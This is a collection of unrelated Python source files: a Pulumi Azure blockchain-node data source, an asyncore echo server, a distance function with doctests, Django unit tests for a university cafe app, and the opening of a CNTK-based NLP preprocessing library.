pulumi.set(__self__, "public_key", public_key)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if user_name and not isinstance(user_name, str):
raise TypeError("Expected argument 'user_name' to be a str")
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def dns(self) -> str:
"""
Gets or sets the transaction node dns endpoint.
"""
return pulumi.get(self, "dns")
@property
@pulumi.getter(name="firewallRules")
def firewall_rules(self) -> Optional[Sequence['outputs.FirewallRuleResponse']]:
"""
Gets or sets the firewall rules.
"""
return pulumi.get(self, "firewall_rules")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
Gets or sets the transaction node location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def password(self) -> Optional[str]:
"""
Sets the transaction node dns endpoint basic auth password.
"""
return pulumi.get(self, "password")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
Gets or sets the blockchain member provision state.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="publicKey")
def public_key(self) -> str:
"""
Gets or sets the transaction node public key.
"""
return pulumi.get(self, "public_key")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the service - e.g. "Microsoft.Blockchain"
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="userName")
def user_name(self) -> str:
"""
Gets or sets the transaction node dns endpoint basic auth user name.
"""
return pulumi.get(self, "user_name")
class AwaitableGetTransactionNodeResult(GetTransactionNodeResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetTransactionNodeResult(
dns=self.dns,
firewall_rules=self.firewall_rules,
location=self.location,
name=self.name,
password=self.password,
provisioning_state=self.provisioning_state,
public_key=self.public_key,
type=self.type,
user_name=self.user_name)
def get_transaction_node(blockchain_member_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
transaction_node_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetTransactionNodeResult:
"""
Use this data source to access information about an existing resource.
:param str blockchain_member_name: Blockchain member name.
:param str resource_group_name: The name of the resource group that contains the resource. You can obtain this value from the Azure Resource Manager API or the portal.
:param str transaction_node_name: Transaction node name.
"""
__args__ = dict()
__args__['blockchainMemberName'] = blockchain_member_name
__args__['resourceGroupName'] = resource_group_name
__args__['transactionNodeName'] = transaction_node_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:blockchain/v20180601preview:getTransactionNode', __args__, opts=opts, typ=GetTransactionNodeResult).value
return AwaitableGetTransactionNodeResult(
dns=__ret__.dns,
firewall_rules=__ret__.firewall_rules,
location=__ret__.location,
name=__ret__.name,
password=__ret__.password,
provisioning_state=__ret__.provisioning_state,
public_key=__ret__.public_key,
type=__ret__.type,
user_name=__ret__.user_name)
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
import asyncore
import logging
logging.basicConfig(level=logging.DEBUG,
format='[*] %(name)s - %(funcName)16s - %(message)s')
class EchoHandler(asyncore.dispatcher_with_send):
def __init__(self, _sock=None, _map=None):
self.logger = logging.getLogger('EchoHandler')
self.BUFSIZE = 1024
asyncore.dispatcher.__init__(self, _sock, _map)
self.out_buffer = ''
def readable(self):
return True
def writable(self):
return False
def handle_read(self):
        data = self.recv(self.BUFSIZE)
        self.logger.debug('%d bytes | client -> server' % len(data))
        self.send(data)
        self.logger.debug('%d bytes | client <- server' % len(data))
    # asyncore's write-event callback is handle_write; a method named handle_writable is never called
    def handle_write(self):
        pass
def handle_error(self):
self.logger.debug('socket exception')
def handle_close(self):
self.close()
class EchoServer(asyncore.dispatcher):
def __init__(self):
self.logger = logging.getLogger('EchoServer')
asyncore.dispatcher.__init__(self)
self.create_socket(asyncore.socket.AF_INET,
asyncore.socket.SOCK_STREAM)
# socket reuse address
self.set_reuse_addr()
self.logger.debug('create a socket')
self.bind(('localhost', 8080))
self.logger.debug('bind socket address')
self.listen(1)
self.logger.debug('listen socket on %s:%s' % ('localhost', 8080))
def handle_accept(self):
client, caddr = self.accept()
self.logger.debug('client: %s:%s' % caddr)
EchoHandler(client)
self.logger.debug('Enter into EchoHandler')
if __name__ == "__main__":
EchoServer()
asyncore.loop()
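# To exercise the server (illustrative): run this script, then connect from another
# terminal with a plain TCP client such as `nc localhost 8080` or `telnet localhost 8080`
# and type a line - it is echoed back.
# Note: asyncore is deprecated and was removed in Python 3.12; new code should prefer asyncio.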
|
import math
def euclidean_distance(A, B):
"""
>>> A = (1, 0)
>>> B = (0, 1)
>>> euclidean_distance(A, B)
1.4142135623730951
>>> euclidean_distance((0,0), (1,0))
1.0
>>> euclidean_distance((0,0), (1,1))
1.4142135623730951
>>> euclidean_distance((0,1), (1,1))
1.0
>>> euclidean_distance((0,10), (1,1))
9.055385138137417
"""
x1 = A[0]
x2 = B[0]
y1 = A[1]
y2 = B[1]
part_x = (x2-x1) ** 2
part_y = (y2-y1) ** 2
return math.sqrt(part_x + part_y)
    # Equivalent one-line alternatives (the returns below were unreachable dead code):
    # return math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)
    # return math.sqrt(pow(B[1] - A[1], 2) + pow(B[0] - A[0], 2))
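# Minimal addition (not part of the original file) so the doctests above can be
# executed by running this file directly.
if __name__ == "__main__":
    import doctest
    doctest.testmod()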
|
""" Functions used for Unit Testing our web application """
from django.test import SimpleTestCase, TestCase, Client
from django.template.loader import render_to_string
from app.models import CafeTable, CoffeeUser, Message, Report, Task
client = Client()
class LogInTests(TestCase):
""" Unit tests for login page """
def setUp(self):
""" Setting up test user"""
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
def test_login_view_status_code(self):
""" Testing whether the status of the login page is OK
(if it's reachable) """
resp = self.client.get('') # login page
self.assertEqual(resp.status_code, 200)
def test_csrf(self):
""" Testing whether a csrf token exists for security """
resp = self.client.get('')
self.assertContains(resp, 'csrfmiddlewaretoken')
def test_template(self):
""" Testing the correct template is rendered """
resp = self.client.get('')
self.assertTemplateUsed(resp, 'login.html')
def test_login_correct(self):
""" Testing correct login """
data = {'email': 'test@test.com', 'password': '123'}
resp = self.client.post('', data) # login page
self.assertEqual(resp.status_code, 302)
def test_login_blank(self):
""" Testing with blank login details """
data = {'email': '', 'password': ''}
resp = self.client.post('', data)
self.assertEqual(resp.status_code, 200)
def test_login_bad_email(self):
""" Testing with incorrect email format """
data = {'email': 'a', 'password': 'ABCabc123!'}
resp = self.client.post('', data)
self.assertEqual(resp.status_code, 200)
def test_login_wrong_psw(self):
""" Testing with wrong password """
data = {'email': 'test@test.com', 'password': 'a'}
resp = self.client.post('', data)
self.assertEqual(resp.status_code, 200)
def test_login_nonexistent_user(self):
""" Testing with user that doesn't exist """
data = {'email': 'test2@test.com', 'password': 'a'}
resp = self.client.post('', data)
self.assertEqual(resp.status_code, 200)
class SignUpTests(TestCase):
""" Unit tests for signup page """
def setUp(self):
""" Setting up test user"""
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
def test_signup_view_status_code(self):
""" Testing whether the status of the signup page is OK
(if it's reachable) """
resp = self.client.get('/signup')
self.assertEqual(resp.status_code, 200)
def test_csrf(self):
""" Testing whether a csrf token exists for security """
resp = self.client.get('/signup')
self.assertContains(resp, 'csrfmiddlewaretoken')
def test_template(self):
""" Testing the correct template is rendered """
resp = self.client.get('/signup')
self.assertTemplateUsed(resp, 'sign_up.html')
def test_signup_valid_form(self):
""" Testing signing up a valid user """
data = {'email': 'test2@test.com', 'first_name': 'a', 'last_name': 'b',
'is_staff': False, 'university': "Test uni",
'password1': 'ABCabc123!', 'password2': 'ABCabc123!',
'accept_terms': True}
resp = self.client.post('/signup', data)
self.assertEqual(resp.status_code, 302)
def test_signup_repeat_email(self):
""" Testing signing up a user email that already exists"""
data = {'email': 'test@test.com', 'first_name': 'a', 'last_name': 'b',
'is_staff': False, 'university': "Test uni",
'password1': 'ABCabc123!', 'password2': 'ABCabc123!',
'accept_terms': True}
resp = self.client.post('/signup', data)
self.assertEqual(resp.status_code, 200)
def test_signup_pswd_different(self):
""" Testing signing up when passwords don't match"""
data = {'email': 'test2@test.com', 'first_name': 'a', 'last_name': 'b',
'is_staff': False, 'university': "Test uni",
'password1': 'ABCabc123!!', 'password2': 'ABCabc123!',
'accept_terms': True}
resp = self.client.post('/signup', data)
self.assertEqual(resp.status_code, 200)
def test_signup_no_terms(self):
""" Testing signing up when terms not agreed to"""
data = {'email': 'test2@test.com', 'first_name': 'a', 'last_name': 'b',
'is_staff': False, 'university': "Test uni",
'password1': 'ABCabc123!!', 'password2': 'ABCabc123!',
'accept_terms': False}
resp = self.client.post('/signup', data)
self.assertEqual(resp.status_code, 200)
def test_signup_bad_psw(self):
""" Testing signing up when password is too bad"""
data = {'email': 'test2@test.com', 'first_name': 'a', 'last_name': 'b',
'is_staff': False, 'university': "Test uni",
'password1': 'a', 'password2': 'a',
'accept_terms': False}
resp = self.client.post('/signup', data)
self.assertEqual(resp.status_code, 200)
def test_signup_not_an_email(self):
""" Testing signing up when terms not agreed to"""
data = {'email': 'fish', 'first_name': 'a', 'last_name': 'b',
'is_staff': False, 'university': "Test uni",
'password1': 'a', 'password2': 'a',
'accept_terms': False}
resp = self.client.post('/signup', data)
self.assertEqual(resp.status_code, 200)
def test_signup_blank(self):
""" Testing signing up when blank fields"""
data = {'email': 'fish', 'password1': 'ABCabc123!',
'password2': 'ABCabc123!', 'accept_terms': False}
resp = self.client.post('/signup', data)
self.assertEqual(resp.status_code, 200)
class PrivacyPolicyTests(TestCase):
""" Unit tests for privacy policy page """
def test_privacy_policy_view_status_code(self):
""" Testing whether the status of the privacy policy page is OK
(if it's reachable) """
resp = self.client.get('/privacy')
self.assertEqual(resp.status_code, 200)
class TermsTests(TestCase):
""" Unit tests for terms and conditions page """
def test_tandc_view_status_code(self):
""" Testing whether the status of the terms & conditions page is OK
(if it's reachable) """
resp = self.client.get('/terms')
self.assertEqual(resp.status_code, 200)
class TablesViewTests(TestCase):
""" Unit tests for table view page """
def setUp(self):
""" Setting up test tables with content for testing """
table = CafeTable.objects.create(table_id='Test',
university='Test uni')
table2 = CafeTable.objects.create(table_id='Test 2',
university='Test uni')
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
user.cafe_table_ids.add(table)
self.client.login(email='test@test.com', password='123')
def test_tables_view_status_code(self):
""" Testing whether the status of the tables view page is OK
(if it's reachable) """
resp = self.client.get('/table_view')
self.assertEqual(resp.status_code, 200)
def test_tables_view_content(self):
""" Testing to see whether the correct table name is displayed """
resp = self.client.get('/table_view')
response_html = resp.content.decode()
self.assertEqual(resp.status_code, 200)
self.assertTrue('Test' in response_html)
self.assertFalse('Test 2' in response_html)
class InTableTests(TestCase):
""" Unit tests for table content pages """
def setUp(self):
""" Setting up test tables with content for testing """
table = CafeTable.objects.create(table_id='Test',
university='Test uni')
table2 = CafeTable.objects.create(table_id='Test 2',
university='Test uni')
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
user.cafe_table_ids.add(table)
self.client.login(email='test@test.com', password='123')
def test_in_table_view_correct(self):
""" Testing to see whether the correct table content is displayed """
resp = self.client.get('/tables/1')
response_html = resp.content.decode()
self.assertEqual(resp.status_code, 200)
self.assertNotEqual(response_html, render_to_string('denied.html'))
self.assertTrue('testf testl' in response_html) # names
def test_csrf(self):
""" Testing whether a csrf token exists for security """
resp = self.client.get('/tables/1')
self.assertContains(resp, 'csrfmiddlewaretoken')
def test_new_message_valid_post_data(self):
""" Testing to see whether the inputted message content is correctly
identified """
data = {
'message_content': 'Test msg',
}
self.client.post('/tables/1', data)
self.assertTrue(Message.objects.exists())
resp = self.client.get('/get_msgs/1')
response_html = resp.content.decode()
self.assertTrue('Test msg' in response_html)
def test_new_message_empty_post_data(self):
""" Testing to see if a message with no content is correctly
identified """
data = {
'message_content': '',
}
resp = self.client.post('/tables/1', data)
self.assertEqual(resp.status_code, 200)
self.assertFalse(Message.objects.exists())
def test_upvote(self):
""" Testing to see whether the inputted message content is correctly
identified """
data = {
'message_content': 'Test msg',
}
self.client.post('/tables/1', data)
msg = Message.objects.get(message_content='Test msg')
self.client.get('/upvote/' + str(msg.id))
resp = self.client.get('/get_msgs/1')
response_html = resp.content.decode()
self.assertTrue('1 Likes' in response_html)
def test_in_table_view_not_part_table(self):
""" Testing to see if incorrect table view is correctly identified
and handled"""
resp = self.client.get('/tables/2')
response_html = resp.content.decode()
self.assertEqual(resp.status_code, 200)
self.assertEqual(response_html, render_to_string('denied.html'))
def test_in_table_view_not_exist_table(self):
""" Testing to see if non existent table view is correctly identified
and handled"""
resp = self.client.get('/tables/3')
response_html = resp.content.decode()
self.assertEqual(resp.status_code, 200)
self.assertEqual(response_html, render_to_string('denied.html'))
class DashboardTests(TestCase):
""" Unit tests for dashboard page """
def setUp(self):
""" Setting up test tables with content for testing """
table = CafeTable.objects.create(table_id='Test',
university='Test uni')
table2 = CafeTable.objects.create(table_id='Test 2',
university='Test uni')
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
user.cafe_table_ids.add(table)
self.client.login(email='test@test.com', password='123')
def test_status_code(self):
""" Testing whether the status of the dashboard page is OK
(if it's reachable) """
resp = self.client.get('/dashboard')
self.assertEqual(resp.status_code, 200)
def test_template(self):
""" Testing the correct template is rendered """
resp = self.client.get('/dashboard')
self.assertTemplateUsed(resp, 'dashboard.html')
# Check whether it's displaying the correct user
response_html = resp.content.decode()
self.assertTrue(CoffeeUser.objects.get(
email='test@test.com').first_name in response_html)
self.assertTrue(CoffeeUser.objects.get(
email='test@test.com').last_name in response_html)
def test_check_collectables(self):
""" Testing the correct collectable is calculated """
resp = self.client.get('/dashboard')
response_html = resp.content.decode()
self.assertTrue('Espresso' in response_html)
self.assertTrue('Points till next collectable: 50' in response_html)
class EditInfoTests(TestCase):
""" Unit tests for edit info page """
def setUp(self):
""" Setting up test tables with content for testing """
table = CafeTable.objects.create(table_id='Test',
university='Test uni')
table2 = CafeTable.objects.create(table_id='Test 2',
university='Test uni')
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
user.cafe_table_ids.add(table)
self.client.login(email='test@test.com', password='123')
def test_status_code(self):
""" Testing whether the status of the edit info page is OK
(if it's reachable) """
resp = self.client.get('/dashboard/edit_info')
self.assertEqual(resp.status_code, 200)
def test_csrf(self):
""" Testing whether a csrf token exists for security """
resp = self.client.get('/dashboard/edit_info')
self.assertContains(resp, 'csrfmiddlewaretoken')
def test_template(self):
""" Testing whether the edit info page is used """
resp = self.client.get('/dashboard/edit_info')
self.assertTemplateUsed(resp, 'edit_info.html')
def test_changing_info(self):
""" Testing to see whether edits in the edit info page are correctly
identified """
data = {
'first_name': 'testfirstname',
'last_name': 'testlastname',
}
self.assertEqual(CoffeeUser.objects.get(
email='test@test.com').first_name, 'testf')
self.assertEqual(CoffeeUser.objects.get(
email='test@test.com').last_name, 'testl')
request = self.client.post('/dashboard/edit_info', data)
self.assertEqual(CoffeeUser.objects.get(
email='test@test.com').first_name, 'testfirstname')
self.assertEqual(CoffeeUser.objects.get(
email='test@test.com').last_name, 'testlastname')
class SetTaskTests(TestCase):
""" Unit tests for set tasks page """
def setUp(self):
""" Setting up test tables with content for testing """
table = CafeTable.objects.create(table_id='Test',
university='Test uni')
table2 = CafeTable.objects.create(table_id='Test 2',
university='Test uni')
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=True, password='123'
)
user.cafe_table_ids.add(table)
self.client.login(email='test@test.com', password='123')
def test_status_code(self):
""" Testing whether the status of the set tasks page is OK
(if it's reachable) """
resp = self.client.get('/set_tasks')
self.assertEqual(resp.status_code, 200)
def test_csrf(self):
""" Testing whether a csrf token exists for security """
resp = self.client.get('/set_tasks')
self.assertContains(resp, 'csrfmiddlewaretoken')
def test_template(self):
""" Testing whether set tasks page is successfully used """
resp = self.client.get('/set_tasks')
self.assertTemplateUsed(resp, 'set_tasks.html')
def test_task_in_db(self):
""" Testing to see if setting a new task is correctly registered """
table = CafeTable.objects.get(id=1)
data = {
'task_name': 'f',
'table_id': str(table.id),
'task_content': 'fff',
'points': 1,
'recurrence_interval': 'n',
'max_repeats': 0,
}
self.assertTrue(Task.objects.count() == 0)
self.client.post('/set_tasks', data)
self.assertTrue(Task.objects.count() == 1)
class ViewTaskTests(TestCase):
""" Unit tests for view tasks page """
def setUp(self):
""" Setting up test tables with content for testing """
table = CafeTable.objects.create(table_id='Test',
university='Test uni')
table2 = CafeTable.objects.create(table_id='Test 2',
university='Test uni')
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
user2 = CoffeeUser.objects.create_user(
email='test2@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=True, password='123'
)
Task.objects.create(task_name="tasktest", table_id=table,
created_by=user2, task_content="lol", points=1)
Task.objects.create(task_name="tasktestNTable", table_id=table2,
created_by=user2, task_content="lol", points=1)
Task.objects.create(task_name="tasktestNUser", table_id=table2,
created_by=user, task_content="lol", points=1)
user.cafe_table_ids.add(table)
self.client.login(email='test@test.com', password='123')
def test_status_code(self):
""" Testing whether the status of the view tasks page is OK
(if it's reachable) """
resp = self.client.get('/view_tasks')
self.assertEqual(resp.status_code, 200)
def test_task_exists_in_db(self):
""" Testing database to see if created task is correctly registered """
        self.assertEqual(Task.objects.count(), 3)  # three tasks are created in setUp
def test_template_connection(self):
""" Testing whether view tasks page template is used """
resp = self.client.get('/view_tasks')
self.assertTemplateUsed(resp, 'view_tasks.html')
def test_right_tasks_displayed(self):
""" Testing to see if only the tasks for the specific table are
displayed """
resp = self.client.get('/view_tasks')
response_html = resp.content.decode()
self.assertTrue('tasktest' in response_html)
self.assertFalse('tasktestNTable' in response_html)
self.assertFalse('tasktestNUser' in response_html)
# Tasks only from the correct tables are displayed + cannot see own
# tasks
def test_complete_task(self):
""" Tests points earn when task completed """
self.client.get('/complete/1')
resp = self.client.get('/view_tasks')
response_html = resp.content.decode()
user = CoffeeUser.objects.get(id=1)
self.assertTrue(user.points == 3)
self.assertFalse('tasktest' in response_html)
class ReportingTests(TestCase):
""" Unit tests for reports page """
def setUp(self):
""" Setting up test tables with content for testing """
table = CafeTable.objects.create(table_id='Test',
university='Test uni')
self.user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
self.user.cafe_table_ids.add(table)
self.client.login(email='test@test.com', password='123')
def test_status_code(self):
""" Testing whether the status of the report page is OK
(if it's reachable) """
resp = self.client.get('/report')
self.assertEqual(resp.status_code, 200)
self.assertTemplateUsed(resp, 'report.html')
def test_csrf(self):
""" Testing whether a csrf token exists for security """
resp = self.client.get('/report')
self.assertContains(resp, 'csrfmiddlewaretoken')
def test_create_report(self):
""" Testing whether a created report is managed correctly """
table = CafeTable.objects.get(id=1)
self.client.get('/report')
data = {
'title': 'TestReport-213943',
'category': "Other",
'detail': 'fff',
'table_id': str(table.id),
}
self.assertEqual(Report.objects.count(), 0)
resp = self.client.post('/report', data)
# Check request is successful
        self.assertEqual(resp.status_code, 200)
# Check object created in database
self.assertEqual(Report.objects.count(), 1)
class ProfileTests(TestCase):
""" Unit tests for profile page """
def setUp(self):
""" Setting up test tables with content for testing """
table = CafeTable.objects.create(table_id='Test',
university='Test uni')
table2 = CafeTable.objects.create(table_id='Test 2',
university='Test uni')
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
user.cafe_table_ids.add(table)
self.client.login(email='test@test.com', password='123')
def test_status_code(self):
""" Testing whether the status of the profile page is OK
(if it's reachable) """
resp = self.client.get('/profile_page/1')
self.assertEqual(resp.status_code, 200)
def test_profile_not_exist_user(self):
""" Testing to see if non existent user is correctly identified
and handled"""
resp = self.client.get('/profile_page/8')
response_html = resp.content.decode()
self.assertEqual(response_html, render_to_string(
'profile_nonexistent.html'))
def test_template(self):
""" Testing the correct template is rendered """
resp = self.client.get('/profile_page/1')
self.assertTemplateUsed(resp, 'profile_page.html')
def test_profile_content(self):
""" Testing correct user is displayed """
resp = self.client.get('/profile_page/1')
response_html = resp.content.decode()
self.assertTrue(CoffeeUser.objects.get(
email='test@test.com').first_name in response_html)
self.assertTrue(CoffeeUser.objects.get(
email='test@test.com').last_name in response_html)
class HealthEndpointTests(SimpleTestCase):
""" Unit tests for overall web application status"""
def test_health_status_is_up(self):
""" Testing whether the application as a whole is reachable """
resp = self.client.get('/health')
self.assertEqual(resp.status_code, 200)
self.assertContains(resp, '{"status": "UP"}')
class ActiveUsersTest(TestCase):
""" Unit test for function calculating number of active users."""
def setUp(self):
""" Setting up test tables with content for testing """
user = CoffeeUser.objects.create_user(
email='test@test.com', first_name='testf', last_name='testl',
university='Test uni', is_staff=False, password='123'
)
self.client.login(email='test@test.com', password='123')
def test_active_users(self):
""" Testing to see if number of active users is correct """
resp = self.client.get('/table_view')
response_html = resp.content.decode()
self.assertTrue('Users in Cafe: 1' in response_html)
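# These tests run under Django's standard test runner, e.g. `python manage.py test`
# from the project root (the exact app label depends on the project layout).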
|
name = "yalesmartalarmclient"
|
### NLP TOOLBOX LIBRARY ###
# Created by Dmitri Paley
# ~First public version~
# This library was created to make certain deep-learning NLP uses easily accessible and usable by anyone
# The library is made to be easily imported into your Python code and for complex operations to be simply called via a few simple commands
# Call the GetHelp method of any module to get tips on how to use them
# Call the GetModulesInfo class to get the info about all modules present
#
# Future versions will include:
# Query / Sequence Classification
# Deep Structured Similarity Model
# Semantic space visualization
# Speech to text
# Text to speech
#
#########################
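#
# Illustrative quick-start (file names and paths below are placeholders, not files
# shipped with the library; see each module's GetHelp for details):
#
#   converter = TxtToCtf(txt_path='data/', source_filename='source.txt',
#                        target_filename='target.txt', ctf_save_path='data/ctf/',
#                        ctf_filename='training.ctf')
#   model = SequenceToSequence('my_model', 'models/', 'data/ctf/')
#   model.SetFileData('training.ctf', 'training.ctf', 'training.ctf', 'vocabulary.mapping')
#   model.SetModelVariables()
#   model.InitiateModel()
#   model.TrainModel(epochs=4)   # epoch_size defaults to the training file's line count
#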
from __future__ import print_function
import cntk as C
import numpy as np
import os
import requests
import sys
class GetModulesInfo():
def __init__(self):
print("The current modules in the library are:\nTxtToCtf - used to prep your .txt files into a .ctf and .mapping files necessary for the SequenceToSequence model\nSequenceToSequence - the LSTM with Embedding and Attention model for sequence to sequence translation")
class TxtToCtf():
''' FUTURE IMPROVEMENTS:
TEST CTF PREP, VALIDATION CTF PREP
    CUSTOM NON_SYMBOLS VOCABULARY SUPPORT, CUSTOM ALPHABET SUPPORT, CUSTOM REPLACE AND REPLACE_WITH LISTS SUPPORT
'''
def __init__(self, txt_path, source_filename, target_filename, ctf_save_path, ctf_filename, eos_manual='#', target_eos='</s>', target_bos='<s>', target_Meos = '<s/>', source_field_marker = 'S0', target_field_marker = 'S1'):
self.seq_field_src = source_field_marker
self.seq_field_trgt = target_field_marker
self.txt_path = txt_path
self.source_filename = source_filename
self.target_filename = target_filename
self.ctf_path = ctf_save_path
self.ctf_filename = ctf_filename
self.ctf_filepath = None
self.vocab_filepath = None
self.eos_manual = eos_manual
self.target_eos = target_eos
self.target_Meos = target_Meos
self.target_bos = target_bos
        # alphabet vocab, plus the symbols to replace and what to replace them with (the two lists must stay aligned by index)
self.non_symbols = ["'",'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'] # this is a constant list
self.symbols_replace = ['”', '“', "it's", "i'm", "they're", "what're", "he's", "she's", "you're","we're","isn't", "aren't", "wasn't", "weren't", "don't","doesn't","didn't","i've", "we've", "haven't", "you've", "hadn't", "can't", "couldn't", "mustn't", "shan't", "shouldn't", "we'll", "they'll", "i'll", "we'd", "you'd","i'd","he'd","she'd","it'd","we'd","they'd","let's"] # this is a constant list
self.symbols_replace_with = ['"', '"', "it is", "i am", "they are", "what are", "he is", "she is", "you are", "we are", "is not", "are not", "was not", "were not", "do not", "does not", "did not", "i have", "we have", "have not", "you have", "had not", "can not", "could not", "must not", "shall not", "should not", "we will", "they will", "i will", "we would", "you would", "i would", "he would", "she would", "it would", "we would", "they would", "let us"]
self.source_filepath = self.path_join(source_filename)
self.target_filepath = self.path_join(target_filename)
self.ctf_path_join()
self.tokens_source = self.prep_tokens(self.source_filepath)
self.tokens_target = self.prep_tokens(self.target_filepath)
self.vocab = self.prep_vocab()
self.enum, self.i2w, self.w2i = self.save_vocab_and_enum()
self.ctf_writer(self.convert_to_ctf())
    def GetHelp(self):
print("You are using the TextToCtf module from the NLP toolbox library, built by Dmitri Paley.\nInstructions on how to use:\n")
print("The TextToCtf module takes two .txt files - the source and the target files, source being what you want to translate FROM, target being what you want to translate TO, and creates a paired CTF file for use with the SequenceToSequence module. It also creates a .mapping vocabulary file containing the vocabulary from all the sequences.\nFORMATTING THE SOURCE AND TARGET FILES:\nThe source and target texts should be in plain .txt format files, and saved in the UTF-8 format. When saving the .txt file, simply click Save As and select the UTF-8 format at the bottom of the save screen.\nThe text in the .txt files needs to be manually divided into the sequences via the manual_eos marker.\n The default manual_eos marker is a hashtag (#). The use is simple - for every sequence pair in your source and target files, just put the manual_eos marker at the end of the sequences.\nFor example, if your source file says 'mary had a little lamb, she walked it in the park', and your target file says 'mary had a big fat lamb, who sat around all day', you might write 'mary had a little lamb,# she walked it in the park#' in the source file and 'mary had a big fat lamb,#, who sat around all day#', simply adding the manual_eos marker, # by default, at the end of every sequence. What constitnues a sequence is up to you to decide.\nBoth source and target files absolutaly have to have the same amount of sequences, in order for correct pairing to occur, so they have to have the same amount of manual_eos markers (by default, same amount of hashtags #).\nIf you downloaded the example texts, check them out to get the picture.\n\n")
print("USE INSTRUCTIONS:\nInstantiate the TextToCtf module with the variables for:\ntxt_path = the path of the directory containing the .txt files\nsource_filename = the name of the .txt file of your source text, including extension, like: my_source.txt\ntarget_filename = the name of the .txt file of your target text, including the .txt file extension\nctf_save_path = the path of the directory where you want the paired .ctf file to be saved, as well as where the .mapping vocabulary file is saved. Both the .ctf and .mapping files are what the SequenceToSequence module uses to train\nctf_filename = the name of the .ctf file to create, including the .ctf extension. For example: training_file.ctf\n")
print("Optional variables - these variables have a pre-defined default value already, and you should only change this if you understand what and why you are doing it. The defaults are:\neos_manual='#'\ntarget_eos='</s>'\ntarget_bos='<s>'\ntarget_Meos = '<s/>'\nsource_field_marker = 'S0'\ntarget_field_marker = 'S1'")
print("\n\nOnce instantiated with the variables, the TextToCtf module will automatically process both the source and target texts into the correct format and necessary files for the SequenceToSequence module and will automatically save the needed files to the directory you specified in the ctf_save_path variable.")
def path_join(self, text_name):
text_filepath = os.path.join(self.txt_path, text_name)
if not os.path.exists(text_filepath):
print("Error: File path {} does not exist. Please create it, or make sure the file is in it and named correctly.".format(self.txt_filepath))
sys.exit("Action stopped")
return text_filepath
def ctf_path_join(self):
if not os.path.exists(self.ctf_path):
try:
os.makedirs(self.ctf_path)
except:
print("Error: Coult not create {} directory. Please create the directory.".format(self.ctf_path))
sys.exit("Action stopped")
self.ctf_filepath = os.path.join(self.ctf_path, self.ctf_filename)
vocab = 'vocabulary.mapping'
self.vocab_filepath = os.path.join(self.ctf_path, vocab)
def txt_to_tokens(self, filepath):
txt = open(filepath, 'r', encoding='utf-8-sig')
words = txt.read().lower().split()
return words
def split_n_flatten(self, words_list):
# split all words & symbols (creates list of lists)
for index in range(len(words_list)):
words_list[index] = words_list[index].split()
# flatten list of lists
words_list = [word for sublist in words_list for word in sublist]
return words_list
def prep_tokens(self, text_path):
words = self.txt_to_tokens(text_path)
# space out all symbols from words
for index in range(len(words)):
new_word = ''
for character in words[index]:
if character not in self.non_symbols:
new_c = ''.join([' ',character,' '])
new_word = new_word + new_c
else:
new_word = new_word + character
words[index] = new_word
# split & flatten
words = self.split_n_flatten(words)
# replace repleables
words.insert(0, self.target_bos)
for index in range(len(words)):
if words[index] in self.symbols_replace:
words[index] = self.symbols_replace_with[self.symbols_replace.index(words[index])]
if words[index] == self.eos_manual:
if index != (len(words) - 1):
words[index] = ' '.join([self.target_eos, self.target_bos])
else:
words[index] = self.target_eos
# split & flatten
words = self.split_n_flatten(words)
# ALL TOKENS SHOULD NOW BE PRE-PROCESSED
return words
def prep_vocab(self):
# extract all unique tokens from words to build vocabulary
vocab_tokens = ["'" ,self.target_eos, self.target_Meos, self.target_bos]
for token in self.tokens_source:
if token not in vocab_tokens:
vocab_tokens.append(token)
for token in self.tokens_target:
if token not in vocab_tokens:
vocab_tokens.append(token)
return vocab_tokens
def save_vocab_and_enum(self):
enum=[]
index_2_word={}
word_2_index={}
vocab_file = open(self.vocab_filepath, "w", encoding='utf-8-sig')
for count, token in enumerate(self.vocab):
enum.append(count + 1)
if (count + 1) == len(self.vocab):
vocab_file.write(token)
else:
vocab_file.write(''.join([token,'\n']))
index_2_word.update({(count+1):token})
word_2_index.update({token:(count+1)})
vocab_file.close()
print("Vocabulary saved to %s." %self.vocab_filepath)
return enum, index_2_word, word_2_index
# THE NEXT STEP IS - WITH VOCAB TOKENS & ENUMERATE - CREATE TWO CTF PAIRING LISTS
# LASTLY, CREATE SINGLE CTF WITH FULL PAIRINGS
